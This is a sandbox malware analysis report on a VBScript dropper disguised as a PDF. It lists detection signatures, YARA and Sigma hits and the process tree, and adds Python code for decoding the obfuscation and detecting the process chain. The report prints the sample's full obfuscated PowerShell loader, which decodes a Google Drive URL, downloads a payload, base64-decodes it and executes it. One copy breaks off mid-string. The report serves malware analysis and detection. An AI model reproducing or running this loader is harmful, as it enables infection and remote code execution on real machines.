
Windows Analysis Report
U00b7pdf.vbs

Overview

General Information

Sample name: U00b7pdf.vbs (renamed because the original name is a hash value)
Original sample name: () 24 (240415)pdf.vbs
Analysis ID: 1425936
MD5: 6e74f3450b6a5719b9e71f6ea32295ce
SHA1: 790344f4225b4a5e904f3e06de6aac6fa9fe58d5
SHA256: 6c0c6d699be7442dcd1e34507ac5f9103fcf2a220b032e2e7159805c820a0483
Tags: vbs

Detection

Score: 100 (range: 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Potential dropper URLs found in powershell memory
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

(classification chart rendered as text: categories Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; verdict scale clean / suspicious / malicious)
  • System is w10x64
  • wscript.exe (PID: 3948 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U00b7pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6500 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Storvesirerne = 1;$Theologizing='Substrin';$Theologizing+='g';Function Rekordjagt($Spermosphere){$Tryghedsnarkomanerne=$Spermosphere.Length-$Storvesirerne;For($Ichthyocentaur=7; $Ichthyocentaur -lt $Tryghedsnarkomanerne; $Ichthyocentaur+=(8)){$Cottiers+=$Spermosphere.$Theologizing.Invoke($Ichthyocentaur, $Storvesirerne);}$Cottiers;}function Dentagra176($nittenaarsfdselsdag){. ($Systematist) ($nittenaarsfdselsdag);}$Skrive=Rekordjagt 'Sammen MRb igttoMantramzMice laiReformbl chattelDiplom aTilsend/Skunk r5bomrker. Stri.i0Revalua Ukrist(StatuslWInadjusiAco otlnknitweadForure ofjantenwButtonhsBrugsbe UnimpaiNWienersTE.itaxi obriqu1Bstern 0Kyriali.Und,rda0Aerodyn; ,uling PaedonyW SpectriAllergenQuadric6 Ekstem4Apodeme; Picker Femrernx Ellekr6exies o4Fo,film;.rontag Spaan ar Disenavvvesf,o:Circumf1Tryllek2Uncompr1Unimma,.volemit0Rygskst)Poriapr Ungka lG EdderkeUngainlcRes ectkUnlyricoSexolog/ovnhuse2 econce0 hummer1Sirupsh0Notidan0Marinae1Andengr0Erkyndi1Trkvogn DiamantFNonharmiLicen irUncoloueOleatesfNonumbro GlasblxKasse t/ hromat1Copalin2Satanis1 Deriva. 
Skmtev0Hegemon ';$Rubys=Rekordjagt ' StylteUProsecusOrganiseFade,urr Fjogsf-TyristoASlufssygAn.ideceidentitnShowtimtPeri on ';$Cargoliner=Rekordjagt 'Ast,roih Rep cktSlickertWindroapNonj.rasBoe,neh:Pra inc/Estampi/Mauveagduranophrmalatesistvnersv C ckileTelefon.TrbaadegTornblaoNonreguo ShoalhgBrtsejllkont.nte Voltes.RetstilcVatteriouncathomBaadud,/PaavistuInhalercbane.ak?Frontene Br,dsaxinvocatpv gttaaoDk skoprLubricat portef=OmtalerdSkoleryobrevvekwDubiousnEncastel valitoGipsdepaUnderlodCentime& Undefei,adiostdCon,oci=R.kkest1Bals mmmMo.dilymKatakin5Ar,edtauValentiFAmusivea,orelsndphl.benkSaloond5StatiketKuskeneXB,sttelj VovehaiVitalisZbewidoweCarnosiYOvera eXAld,rmajLhduninWEpa.ortHDaar,kaHAnkl gjF Ventili ,vaporX kanapeFUnmantlf Ma,ked-Karav nB vertisHAdo tivV NonadvBS uljaz_Quotati ';$Constabless=Rekordjagt ' Acture> Immate ';$Systematist=Rekordjagt 'TimbresislavebaeBegonerxSjofeli ';$Ankyloproctia106 = Rekordjagt ' H,ricoe Frank cOmtalenhBeerbiboFreedst Lewist,%OvertypaQ,adrisp synonyp StraffdSerenada Rav lstTorpedoa,rachio% H.plit\WeekendIUsketbarEpicantr h erpre ElectopElephanl KonvenaBod velcAkklimaeGoumieraCircumsbEurop mlSelen gegraablenForsikreUdstra s .ursyls h drum.FacetteSOverratuBastedecEuch,or Solav k&Col.ack&A,gangs GoitereAnsttemcCoazervhSeniorso Proven Contigu$Apperce ';Dentagra176 (Rekordjagt ' Subcya$JourneygMeningol dsboeo Su,ersb ilkombaGnetacelBibliog:Afpa.erHColumbaybec amepSe,plese FluorbrDoerencs LufttreForsyn nAf,rismsStrygejiUnrustibHeldentiGla rinl Krni.ei Draht,tFrictifyOzonate=Washda,(TelefoncSm,dresm hermicdAdoxace Genvisi/.vlningcAdmir l hermov$UncompoAProveninKommandk Unrewoy Ingva lGrimassoHuje trpCowweedrlauds,nokirigamcVe.denst BetutoiCholinea Krimin1Kl,nset0Musikpd6Intermi)pharmac ');Dentagra176 (Rekordjagt 'L gendi$SirrahsgRegulerlFilm.tro ThronibKli ikaapavingslPeridio:DetrudiVWaflibdiTrunkserJunke.egUdmundeiRundkinn H regea Strengl BreastlSatsensyVisumhy= Frif,n$Fatho aCLavritsa HeinerrHier.magDomineeoHjttalelTornskai 
Lum,ernBestteleP,lleeor Rest,a.D.uglcosAcinetapAfskedslNecrophiSuperfatBiplans(Hem gen$TrnjbrtCUnkerchoFuldbefnRabbites LilithtCelluliaKlagerebIso.iazlCullende frdigesSystemis Akkli.)moujiks ');$Cargoliner=$Virginally[0];Dentagra176 (Rekordjagt 'Ell.kra$BavianhgSansninl,verdazoPa alleb Ac,ievaFjerdral For,se: sisyfoTFjortenrLevemuliOutspartStjko tu,isammebUnderboeSkolemerTilt gec AlgkiruSurfperlFu.ionsasalutatrleik.sg= VaertsNAntropoeFnike.dwDummere-E peditOTillavebOrchiocjRescoreeSpyttebc.ippingtD mogra KromgarS Audiomy alaxisSufeismtP,eudonedecurvemHusband.Epap phNLinkx.peUnintuitMisimag.Porto,rWVinkelse BrantsbUsigtbaComstninl Lunterisa.fundeCiviestn HypopytTric nn ');Dentagra176 (Rekordjagt 'Ejendom$NdkcaudTAm.ulanrTotalisi Str pntAlexiusuReprescb,estsigeMalodorr Ne trac,etleheuGulfyhilIntendeaDittychrScrideu.Schesi HCh,ndroeBreatheaUngdomsdCycloheeFractiorBesi desPastaen[En,kter$BoltheaRCobbl suAfgangsbLgelf ey TilvejsM,sshap] Deemph=Orthoxa$RhesuspS .asovnkEzaskrorRatinepiStraighvFlorineeForhast ');$Reinitializes=Rekordjagt 'HvilendTBestyrkrProdukti EtikettOverwa u VegetebCommunie FrstebrPulsi.nc Kriseru AntimelBe.eficaEstraderRegnska.BestrniDAlbigeno CuffspwReetablnNevaditl,ederalo TabelsaInfantedMisformFMicrospiAlkyderlgluti oeEftersl( Unfrac$ PrerecCDeludinaSn,ptagrRediss,gVamfontoperfectlExos eli ForstanDrvtyggeAugmentrTrretum, ,ernsb$ GibuseOValerolb pidsmulraindroiSk.pfulg Timneva Immor,tPlasmaciStall,noSocialbn Indskrs OronokrRoquelaeRkee.gltWarfaret Frsteiefalsn.nnFlerhedsTrach o) Skrive ';$Reinitializes=$Hypersensibility[1]+$Reinitializes;$Obligationsrettens=$Hypersensibility[0];Dentagra176 (Rekordjagt 'Weeken.$OvigermgMbelsnelHorizonoHydrobrbAraneinaTankstal Crumbl: regentS Bordvie EpicysmFormyndi ThyroafUndistoeThumbdir lyrehaoTidskrauShrinalskva,rat=Gangb.t(Driver.T .kolesePsychoasBolsjevtEfterve-NjagtigPGrimassa nsomsttUniversh Person Guelphi$ Mal ilOPeriferbYngelsolsvin,kdiFranc sgBundtekaFrems,it D,triniBssens oMetacarnDisa.ses Anti 
erPunctuaeAfskovntvsentlitIntertieNoalsnon Morel,s Aigudh)Perusal ');while (!$Semiferous) {Dentagra176 (Rekordjagt 'Virt.os$hypotymgDisk,ntlAnsvarsoSkruea,bArchdioaCursi gltourers:UdspredCHyperagu Kngtenr h,wlsbcE eterfuA,akolulAuthentiArbejdsotilhrsf1Spygatt6 Krydde0Fukssva= Gryrsa$LaegkartFjortenrShareowuPartikae Alvide ') ;Dentagra176 $Reinitializes;Dentagra176 (Rekordjagt 'DismissSJobb rit odbolaF,turisrSlikportInjust.-Betonb S UnderrlSprezzaeDeltidseLigularpAgtelse stim rn4Capr,ll ');Dentagra176 (Rekordjagt 'U.vener$ HalvdrgFl,mndelFret,oroRedimenbMagis,eaAnensrelOutbble:Sp.dbjnS ArsenieDi,ulgamReproofiO rrsaafUn corneReasc,nr Spl,ttoTo vinkuMetalans menis=Analyse(VideoplTHj.rtebeSidney,s Barkent Sneakb- C epepPAnchis aBorshtatHyperaehKomiker Jeelped$ PlagioOBlunderbInt.osplBaghussiSt.tssagPsycholaAboiteatSlyngeliPointtaoas.hyxin Tanny sEx,ortarTikampeePaatry,tSyphilotTrullsseVitessenPosturesPoetica) Lentic ') ;Dentagra176 (Rekordjagt 'Mokkasi$K.anategWindchelHftetseo Fag idbPrv tekaReddsmalSkonner: Prci eW Op rtcaPte,ygolRigsbyfkPistolaeIndbildn Demilie Spirit=Kise su$UnkamedgDdspatrlRamexdioFlamberbKra,tanaKatapu lNitroge:PrdikatP Offs.crKraftudeTrommesa Artf.lcUdgivelc E.domoutransprsexostott Taageroselvporm,eminereOrdlistdGrundst+G.seous+Unschol%,reyfly$Erudit,VTekstbeiKileskrrStopklogMirdscuiBlufrdinI,dhsteaBankerolSerenesl Exc,mmyEpicond.He.skabcLigasedoSnogehau machinn Deprivt Gabrie ') ;$Cargoliner=$Virginally[$Walkene];}Dentagra176 (Rekordjagt ' gascon$Bowlin,gL.ndkralPikketroSi imidb S,stemaBihulerlBedro.v:ragaersGUnpala.eRe,otednFrontoon BoligseBasketkmRdligs.rEm.ergeykildlumsOuttel.t minisyeUdpantntKulstof Opgoere=epil ch flawynuG .remfueAfm,grit Tytteb- BusrejCInoffenoGalinsonBubblelt UdvaeleArvem tnLimfabrtinsipid Br.gtfl$HavkattOTrachymbbeseemslDiphycei nwithgcoagu aaDecnetatPersistiNon.enuoatomiesn CiliassAflyssdrPaasknneVelve ptAnnoncetDispatee,ykelbunTrykmaasBjer ni ');Dentagra176 (Rekordjagt 'Chanc,a$Cytoplag Scu.lel Arianio 
coadapbViaduktaRem mbelUltra o:SendebuSFlersidhHeirleseImposanl Hoved l AntelapCoordinoUnprodut Triole Orbb.gr=Th,esub Stann,r[Um eledSfo drveyMinglinsYau snvtRe eptpeObservemAntipro. postaCSpildevoRafflesnGummyinvSyntakseRecleanrT xifyitFortrol]Dagsbef: Mia,ss:Li ieteFmissilfrGoddampoRm rsskmBinde,tBHandelsaSliderssPr,tosueSjalern6Fragmen4S.ovskaSmaltf.btFalklanrUudholdiTostaven Poonacg.rstatn(Beskytt$ BruserG Hnder.ePennysinEluat.dnBoblekae Fornemm Baandsr Forms yFodsveds riticatGaffelte feudaltUdludei)Unjusti ');Dentagra176 (Rekordjagt 'hommos,$Banefulg PerconlNonbrutoTilbagebPatr nia WaspnelAcaulou:HaandgrS ,lokbecMarengsrWeb tedaSlightewforlag.l Bvelsee revendrSto,tilsolivene Superma=Cor cob Viruci[ ObteneSCarmi iy IaomalsForcipatDeck.nge HydropmF.ldblo.SalvninTEsmarale Eph dsxTran,ort Kolleg. UdbudsEAnalysenve stancGainsaioCyborgsdTransfoiCounternMicrophg Smi hc]Vital t:P,ospho: .abellA PhaseaSMisfaitC ArbejdIFilipsgIG yceri.UnfavouGTroubleeMoto istsatir sS PolymetJulef,srLiniestiSy.sttynRataplagTil,rop(Sandkas$ Acce eSSudsmenh CymbideHirsti lPedagoglRhe.usnpJ risdiokundeaftTanekah) Vaagne ');Dentagra176 (Rekordjagt 'plancie$DynamitgThisllplPhascoloLunulaebUnder laClearehlb kldni:FllenesSAfskrkktAkutfunaNedska,tInterplicanop.cs s ndort,akshisi LgnernkPolemarpSensortrForsumpoAarligegDeckelsrDruideraLyknsknmGteskab2Spunkle6doerene=.yvinsa$TanzaniSCrzettec A.abolrBalanopaMisusedwUfordellForhippeDivisi rR,condis Paa ag.Udsendis HematouGaardrybColliersTraffictUvsentlr UrningiCi,ratenAshiestg Sumlog(Monstrs2Fourche9Deu,obr9 Phrase6Advoka,0Klukkes9 Uncial,D,ddelp3Dorritu0Ra.ioli1Recap t5 Filmsp6Ac tylb) Hjrnes ');Dentagra176 $Statistikprogram26;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1148 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Irreplaceableness.Suc && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
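The Rekordjagt routine at the top of the PowerShell command line above is the whole obfuscation scheme: $Theologizing is assembled as 'Substrin'+'g', and the loop copies one character at every eighth position starting at index 7, so each real character is preceded by seven filler characters (word fragments, many of them Danish). Dentagra176 dot-sources its argument through $Systematist, which decodes to iex, so every Dentagra176 (Rekordjagt '...') call executes a decoded string. The Python below is an added example, not code from the report or from the sample, that re-implements the decoder, pulls every $name=Rekordjagt '...' assignment out of a script fragment and decodes it, and round-trips a constructed string through a matching encoder. The fragment embedded in the code is copied from three short assignments in the command line above. One caveat: the HTML rendering of this report collapses runs of whitespace, so the longer literals (the User-Agent string, the download URL, the cmd.exe probe) only decode correctly from the raw .vbs or from the raw command line, not from the text as rendered here.

```python
import random
import re
import string

# Three assignments copied from the report's PowerShell command line. They were
# chosen because they contain no doubled spaces, which the report's HTML
# rendering collapses; longer literals must be decoded from the raw sample.
SAMPLE_SNIPPET = (
    "$Rubys=Rekordjagt ' StylteUProsecusOrganiseFade,urr Fjogsf-"
    "TyristoASlufssygAn.ideceidentitnShowtimtPeri on ';"
    "$Constabless=Rekordjagt ' Acture> Immate ';"
    "$Systematist=Rekordjagt 'TimbresislavebaeBegonerxSjofeli ';"
)

# `$name=Rekordjagt '<blob>'`; the blobs never contain an apostrophe.
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*Rekordjagt\s+'([^']*)'")


def rekordjagt(blob: str, start: int = 7, step: int = 8) -> str:
    """Mirror of the sample's Rekordjagt function.

    PowerShell: For($i=7; $i -lt $blob.Length-1; $i+=8){ $out += $blob.Substring($i, 1) }
    Every eighth character from index 7 is payload; the seven before it are filler.
    The `-lt Length-1` bound means a trailing filler block is never read.
    """
    return "".join(blob[i] for i in range(start, len(blob) - 1, step))


def decode_assignments(ps_source: str) -> dict:
    """Map each `$name=Rekordjagt '...'` literal in a script fragment to its decoded value."""
    return {name: rekordjagt(blob) for name, blob in ASSIGN_RE.findall(ps_source)}


def obfuscate(plain: str, seed: int = 0) -> str:
    """Encoder producing the layout rekordjagt() expects (constructed for the
    round-trip; the sample pads with dictionary-word fragments, random
    characters are used here). Seven filler characters precede every payload
    character and an eight-character filler block closes the string."""
    rng = random.Random(seed)
    alphabet = string.ascii_letters + " .,"
    filler = lambda n: "".join(rng.choice(alphabet) for _ in range(n))
    return "".join(filler(7) + ch for ch in plain) + filler(8)


if __name__ == "__main__":
    for name, value in decode_assignments(SAMPLE_SNIPPET).items():
        print(f"${name:<12} -> {value!r}")
    demo = obfuscate("Invoke-WebRequest", seed=42)
    print(len(demo), "bytes ->", rekordjagt(demo))
```

Run against the raw .vbs, the same regex recovers the full User-Agent ($Skrive), the Google Drive URL ($Cargoliner) and the `echo %appdata%\... && echo $` probe ($Ankyloproctia106) that the sandbox observed on the wire and in the process tree.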
No configs have been found
Source: Process Memory Space: powershell.exe PID: 6500
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0x10cfc5:$b2: ::FromBase64String(
  • 0x10e0cc:$b2: ::FromBase64String(
  • 0x10e117:$b2: ::FromBase64String(
  • 0x1190d7:$b2: ::FromBase64String(
  • 0x11acd1:$b2: ::FromBase64String(
  • 0x22754a:$b2: ::FromBase64String(
  • 0x227588:$b2: ::FromBase64String(
  • 0x2275c1:$b2: ::FromBase64String(
  • 0x2275fb:$b2: ::FromBase64String(
  • 0x227636:$b2: ::FromBase64String(
  • 0x227672:$b2: ::FromBase64String(
  • 0x2276af:$b2: ::FromBase64String(
  • 0x2276ed:$b2: ::FromBase64String(
  • 0x22772c:$b2: ::FromBase64String(
  • 0x22776c:$b2: ::FromBase64String(
  • 0x2277ad:$b2: ::FromBase64String(
  • 0x2277ef:$b2: ::FromBase64String(
  • 0x227832:$b2: ::FromBase64String(
  • 0x227876:$b2: ::FromBase64String(
  • 0x2278bb:$b2: ::FromBase64String(
  • 0x227a05:$b2: ::FromBase64String(
Source: amsi64_6500.amsi.csv
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0xea8c:$b2: ::FromBase64String(
  • 0xdaa8:$s1: -join
  • 0x7254:$s4: +=
  • 0x7316:$s4: +=
  • 0xb53d:$s4: +=
  • 0xd65a:$s4: +=
  • 0xd944:$s4: +=
  • 0xda8a:$s4: +=
  • 0xfebf:$s4: +=
  • 0xff3f:$s4: +=
  • 0x10005:$s4: +=
  • 0x10085:$s4: +=
  • 0x1025b:$s4: +=
  • 0x102df:$s4: +=
  • 0xe287:$e4: Get-WmiObject
  • 0xe476:$e4: Get-Process
  • 0xe4ce:$e4: Start-Process

System Summary

Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U00b7pdf.vbs", ProcessId: 3948, ProcessName: wscript.exe
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U00b7pdf.vbs", ProcessId: 3948, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Storvesirerne = 1;$Theologizing='Substrin';$Theologizing+='g';Function Rekordjagt($Spermosphere){$Tryghedsnarkomanerne=$Spermosphere.Length-$Storvesirerne;For($Ichthyocentaur=7; $Ichthyocentaur -lt $Tryghedsnarkomanerne; $Ichthyocentaur+=(8)){$Cottiers+=$Spermosphere.$Theologizing.Invoke($Ichthyocentaur, $Storvesirerne);}$Cottiers;}function Dentagra176($nittenaarsfdselsdag){. ($Systematist) ($nittenaarsfdselsdag);}$Skrive=Rekordjagt 'Sammen MRb igttoMantramzMice laiReformbl chattelDiplom aTilsend/Skunk r5bomrker. Stri.i0Revalua Ukrist(StatuslWInadjusiAco otlnknitweadForure ofjantenwButtonhsBrugsbe UnimpaiNWienersTE.itaxi obriqu1Bstern 0Kyriali.Und,rda0Aerodyn; ,uling PaedonyW SpectriAllergenQuadric6 Ekstem4Apodeme; Picker Femrernx Ellekr6exies o4Fo,film;.rontag Spaan ar Disenavvvesf,o:Circumf1Tryllek2Uncompr1Unimma,.volemit0Rygskst)Poriapr Ungka lG EdderkeUngainlcRes ectkUnlyricoSexolog/ovnhuse2 econce0 hummer1Sirupsh0Notidan0Marinae1Andengr0Erkyndi1Trkvogn DiamantFNonharmiLicen irUncoloueOleatesfNonumbro GlasblxKasse t/ hromat1Copalin2Satanis1 Deriva. 
Skmtev0Hegemon ';$Rubys=Rekordjagt ' StylteUProsecusOrganiseFade,urr Fjogsf-TyristoASlufssygAn.ideceidentitnShowtimtPeri on ';$Cargoliner=Rekordjagt 'Ast,roih Rep cktSlickertWindroapNonj.rasBoe,neh:Pra inc/Estampi/Mauveagduranophrmalatesistvnersv C ckileTelefon.TrbaadegTornblaoNonreguo ShoalhgBrtsejllkont.nte Voltes.RetstilcVatteriouncathomBaadud,/PaavistuInhalercbane.ak?Frontene Br,dsaxinvocatpv gttaaoDk skoprLubricat portef=OmtalerdSkoleryobrevvekwDubiousnEncastel valitoGipsdepaUnderlodCentime& Undefei,adiostdCon,oci=R.kkest1Bals mmmMo.dilymKatakin5Ar,edtauValentiFAmusivea,orelsndphl.benkSaloond5StatiketKuskeneXB,sttelj VovehaiVitalisZbewidoweCarnosiYOvera eXAld,rmajLhduninWEpa.ortHDaar,kaHAnkl gjF Ventili ,vaporX kanapeFUnmantlf Ma,ked-Karav nB vertisHAdo tivV NonadvBS uljaz_Quotati ';$Constabless=Rekordjagt ' Acture> Immate ';$Systematist=Rekordjagt 'TimbresislavebaeBegonerxSjofeli ';$Ankyloproctia106 = Rekordjagt ' H,ricoe Frank cOmtalenhBeerbiboFreedst Lewist,%OvertypaQ,adrisp synonyp StraffdSerenada Rav lstTorpedoa,rachio% H.plit\WeekendIUsketbarEpicantr h erpre ElectopElephanl KonvenaBod velcAkklimaeGoumieraCircumsbEurop mlSelen gegraablenForsikreUdstra s .ursyls h drum.FacetteSOverratuBastedecEuch,or Solav k&Col.ack&A,gangs GoitereAnsttemcCoazervhSeniorso Proven Contigu$Apperce ';Dentagra176 (Rekordjagt ' Subcya$JourneygMeningol dsboeo Su,ersb ilkombaGnetacelBibliog:Afpa.erHColumbaybec amepSe,plese FluorbrDoerencs LufttreForsyn nAf,rismsStrygejiUnrustibHeldentiGla rinl Krni.ei Draht,tFrictifyOzonate=Washda,(TelefoncSm,dresm hermicdAdoxace Genvisi/.vlningcAdmir l hermov$UncompoAProveninKommandk Unrewoy Ingva lGrimassoHuje trpCowweedrlauds,nokirigamcVe.denst BetutoiCholinea Krimin1Kl,nset0Musikpd6Intermi)pharmac ');Dentagra176 (Rekordjagt 'L gendi$SirrahsgRegulerlFilm.tro ThronibKli ikaapavingslPeridio:DetrudiVW
No Snort rule has matched
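The Sigma hits above fire on the process chain alone: wscript.exe launching a .vbs, then spawning powershell.exe with an 8790-byte command line, and that PowerShell running cmd.exe /c "echo %appdata%\... && echo $" to learn its staging directory. The Python below is an added example, not code from the report or from the Sigma project, that implements the same logic over a constructed list of process-creation events modelled on this report's process tree. PIDs and images are taken from the report; the parent of wscript.exe (PID 4084) is assumed to be explorer.exe, the PowerShell body is stand-in padding rather than the real script, and the two trailing events are a constructed benign control. The code reconstructs the lineage of any PID and flags script-host-to-shell launches, oversized PowerShell command lines, and the environment-variable probe.

```python
import re
from dataclasses import dataclass
from typing import List, NamedTuple

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
LONG_CMDLINE = 4096  # the report's powershell.exe command line is 8790 bytes
# cmd.exe echoing a profile/temp variable is how this sample learns where to stage
ENV_PROBE = re.compile(r"echo\s+%(appdata|localappdata|temp|tmp|programdata)%", re.I)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


class Finding(NamedTuple):
    rule: str
    pid: int
    detail: str


# Constructed events modelled on the report's process tree.
EVENTS = [
    ProcEvent(4084, 1, r"C:\Windows\explorer.exe", "explorer.exe"),  # assumed parent of wscript.exe
    ProcEvent(3948, 4084, r"C:\Windows\System32\wscript.exe",
              r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U00b7pdf.vbs"'),
    ProcEvent(6500, 3948, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Storvesirerne = 1;'
              + "X" * 8700 + '"'),  # padding stands in for the obfuscated body
    ProcEvent(6776, 6500, r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(1148, 6500, r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Irreplaceableness.Suc && echo $"'),
    # constructed benign control: an interactive shell running a short script
    ProcEvent(7000, 4084, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(7100, 7000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\scripts\inventory.ps1"),
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def lineage(events: List[ProcEvent], pid: int) -> List[str]:
    """Root-to-leaf chain of image names for `pid`, stopping at an unknown parent or a loop."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]


def detect(events: List[ProcEvent]) -> List[Finding]:
    """Apply the three process-chain checks to every event that has a known parent."""
    by_pid = {e.pid: e for e in events}
    findings: List[Finding] = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None:
            continue
        pimg, img = basename(parent.image), basename(e.image)
        # "WScript or CScript Dropper" / "Wscript starts Powershell"
        if pimg in SCRIPT_HOSTS and img in SHELLS:
            findings.append(Finding("script_host_spawns_shell", e.pid, f"{pimg} -> {img}"))
        # "Very long command line found"
        if img in POWERSHELL and len(e.cmdline) > LONG_CMDLINE:
            findings.append(Finding("very_long_cmdline", e.pid, f"{len(e.cmdline)} chars"))
        # staging-directory discovery via cmd.exe under PowerShell
        if pimg in POWERSHELL and img == "cmd.exe":
            m = ENV_PROBE.search(e.cmdline)
            if m:
                findings.append(Finding("staging_dir_probe", e.pid, m.group(0)))
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f"{f.rule:<26} pid={f.pid:<5} {f.detail}  lineage={' > '.join(lineage(EVENTS, f.pid))}")
```

The benign control (cmd.exe launching a short PowerShell script) produces no finding, which is the point of keying on parent image and command-line length rather than on powershell.exe alone.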


AV Detection

Source: http://pesterbdd.com/images/Pester.png; URL Reputation: Label: malware (this URL is the IconUri in the manifest of the Pester module that ships with Windows PowerShell, which is also where the github.com/Pester/Pester string under Networking comes from; treat it as a false positive on a built-in module, not as an indicator for this sample)
Source: U00b7pdf.vbs; ReversingLabs: Detection: 15%
Source: unknown; HTTPS traffic detected: 172.217.12.142:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 142.250.72.129:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb_ source: powershell.exe, 00000002.00000002.1544139108.000002615F69D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1572957843.0000026177E51000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdb source: powershell.exe, 00000002.00000002.1543947591.000002615F61D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.1572957843.0000026177E51000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1544139108.000002615F69D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb source: powershell.exe, 00000002.00000002.1572957843.0000026177DF2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *n.pdbr source: powershell.exe, 00000002.00000002.1544139108.000002615F69D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbt source: powershell.exe, 00000002.00000002.1572957843.0000026177E51000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rlib.pdb source: powershell.exe, 00000002.00000002.1572957843.0000026177DF2000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe; Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

